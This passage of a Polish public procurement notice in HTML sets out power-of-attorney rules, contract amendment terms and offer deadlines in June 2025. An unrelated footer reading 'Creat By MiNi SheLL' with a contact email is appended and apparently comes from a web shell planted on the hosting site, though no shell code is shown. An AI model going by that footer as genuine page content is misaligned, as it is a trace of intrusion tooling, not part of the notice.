ich w niniejszym postępowaniu<br/>o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy<br/>w sprawie zamówienia;<br/>c. pełnomocnictwo musi wynikać z umowy lub innej czynności prawnej. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia Zamawiający określił w XI rozdziale SWZ oraz załączniku nr 5 do umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-06-20 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-06-20 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-07-19</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com